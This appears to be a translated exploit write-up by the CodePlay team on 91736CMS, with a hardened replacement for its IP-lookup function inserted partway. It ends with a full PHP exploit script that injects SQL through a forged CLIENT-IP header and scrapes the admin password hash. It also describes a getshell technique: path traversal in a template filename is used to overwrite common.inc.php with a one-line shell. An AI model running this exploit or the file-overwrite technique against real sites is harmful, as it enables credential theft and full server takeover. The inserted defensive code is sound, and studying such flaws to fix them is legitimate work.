Author: Yaseng & Desperado
Team: CodePlay
Reading the source code (from Chinaz) turns up the evil getip():
// Obtain the IP address
function getip() {
    if (getenv("HTTP_CLIENT_IP")) {
        $httpip = getenv("HTTP_CLIENT_IP");
        return $httpip;
    }
    if (getenv("HTTP_X_FORWARDED_FOR")) {
        $httpip = getenv("HTTP_X_FORWARDED_FOR");
        return $httpip;
    }
    if (getenv("HTTP_X_FORWARDED")) {
        $httpip = getenv("HTTP_X_FORWARDED");
        return $httpip;
    }
    if (getenv("HTTP_FORWARDED_FOR")) {
        $httpip = getenv("HTTP_FORWARDED_FOR");
        return $httpip;
    }
    if (getenv("HTTP_FORWARDED")) {
        $httpip = getenv("HTTP_FORWARDED");
        return $httpip;
    }
    $httpip = $_SERVER['REMOTE_ADDR'];
    return $httpip;
}
Many CMSes die right here: every one of those headers is set by the client, and the value is later written into SQL unescaped.
The principle: Baidu it.
Using curl from the command line:
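A hardened replacement for that getip(), added here as an example and not taken from 91736CMS; the $trustedProxies list, the proxy addresses and the UPDATE statement in the comments are assumed deployment details:

```php
<?php
// Added example, not 91736CMS code. $server is normally $_SERVER; $trustedProxies
// lists the reverse proxies allowed to set forwarding headers (assumed layout).
function get_client_ip(array $server, array $trustedProxies = []): string
{
    // REMOTE_ADDR comes from the TCP connection, not from request text,
    // so it is the only value taken without a trust decision.
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';
    }
    // CLIENT-IP and X-Forwarded-* are client-controlled strings: only
    // consult them when the direct peer is a proxy we operate.
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }
    // X-Forwarded-For reads "client, proxy1, proxy2": walk it from the
    // right, skip our own proxies, stop at the first hop we did not add.
    $xff  = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    $hops = array_reverse(array_map('trim', explode(',', $xff)));
    foreach ($hops as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // anything that is not an IP ends the walk
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    return $remote;
}

// Even a validated address is data: the login path must persist it with a
// bound parameter, never by concatenating it into the UPDATE statement.
// $stmt = $pdo->prepare('UPDATE member SET ip = ? WHERE username = ?');
// $stmt->execute([get_client_ip($_SERVER, ['10.0.0.5']), $username]);

// Constructed sample: a direct client putting SQL text in the headers.
// Its peer address is not a trusted proxy, so the headers are never read.
$direct = [
    'REMOTE_ADDR'          => '203.0.113.9',
    'HTTP_CLIENT_IP'       => "1.2.3.4', x=1#",
    'HTTP_X_FORWARDED_FOR' => 'not an ip at all',
];
var_dump(get_client_ip($direct));

// Constructed sample: request relayed by our proxies 10.0.0.5 then 10.0.0.6;
// the trusted hop is skipped and the real client address is returned.
$proxied = ['REMOTE_ADDR' => '10.0.0.6', 'HTTP_X_FORWARDED_FOR' => '198.51.100.7, 10.0.0.5'];
var_dump(get_client_ip($proxied, ['10.0.0.5', '10.0.0.6']));
```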
1. Open php.ini and enable extension=php_curl.dll.
2. Check the directory given by the extension_dir value in php.ini and whether php_curl.dll exists there.
   If not, download php_curl.dll, and copy libeay32.dll and ssleay32.dll from the PHP directory to
   C:\windows\system32
Straight to the exploit
For details, see the attached 91736.php.
Demo
I admit the technique above is very old.
Something new
Cracking that hash on tmd5 costs money, so I used a local demo to get a shell from the backend: backend getShell.
Pleased to see there is a template management page.
Click edit.
Visually it is the Smarty template engine.
{php}
phpinfo();
{/php}
Damn, the {php} tag is prohibited.
Can the template file name be changed?
Tamper with the POST packet:
index.html becomes 1.php
Tragedy. We have to find a way to overwrite an existing PHP file instead.
The template directory is system\templates\default12.
Find a PHP file in system: common.inc.php.
Overwrite it.
Change the file name in Tamper to ../common.inc.php.
View common.inc.php.
PHP written successfully (ps: this method is cumbersome and
will break the site;
it is recommended to replace or restore the file afterwards.
I wrote a one-line shell and then restored it.) I tested the website and found that the latest version throws an error.
I will study it when I have time.
Done !!!
CodePlay code audit exchange group 209547366 (common progress)
91736.php
<?php
print_r('
+---------------------------------------------------------------------------+
91736CMS Getip() Remote SQL Injection Exploit
By CodePlay Team (Yaseng & Desperado)
If exploit success you can see get admin pass
+---------------------------------------------------------------------------+
');
if ($argc < 4) {
    print_r('
+---------------------------------------------------------------------------+
Example:
php ' . $argv[0] . ' localhost name pass
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(3);
ini_set('max_execution_time', 0);
$host     = $argv[1];
$username = $argv[2];
$password = $argv[3];
// Register a user
$styleUrl  = $host . "/index.php?m=member&f=register_save";
$styleData = "username={$username}&password={$password}&password2={$password}&fields%5Btruename%5D={$username}&fields%5Bemail%5D={$username}&submit=+%D7%A2+%B2%E1+";
$ch = curl_init($styleUrl);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $styleData);
curl_setopt($ch, CURLOPT_POST, 1);
$token = curl_exec($ch);
curl_close($ch);
$cookie_file = tempnam('./temp', 'cooker');
$site        = $host;
$post_fields = "username={$username}&password={$password}&button=+%B5%C7%C2%BC+";
// Login packet
$login_url   = $site . "/index.php?m=member&f=login_save";
$cookie_file = tempnam('./temp', 'cooker');
$ch = curl_init($login_url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Construct an IP address: the injection travels in the CLIENT-IP header that getip() trusts
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: fuck', "CLIENT-IP: fuck by C.P.T', `email`=(SELECT password FROM `c_admin`), `logins`=4 WHERE `username`='$username'#"));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_exec($ch);
curl_close($ch);
// Read the profile page: the admin password hash now sits in the email field
$styleUrl  = $host . "/index.php?m=member&f=edit";
$styleData = "";
$ch = curl_init($styleUrl);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
curl_setopt($ch, CURLOPT_POSTFIELDS, $styleData);
curl_setopt($ch, CURLOPT_POST, 1);
$data = curl_exec($ch);
curl_close($ch);
$regex = "/id=\"email\"(.*)<\/td>/i";
preg_match($regex, $data, $result);
$regex = "/value=\"(.*)\"/";
if (preg_match($regex, $result[0], $pass)) {
    echo "shit pass: " . $pass[1] . " and login the admin Panel to getShell";
} else {
    echo "fuck !!! You failed";
}
?>